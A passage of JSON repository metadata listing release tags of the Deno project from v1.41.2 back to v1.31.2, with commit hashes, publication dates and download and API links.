6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccb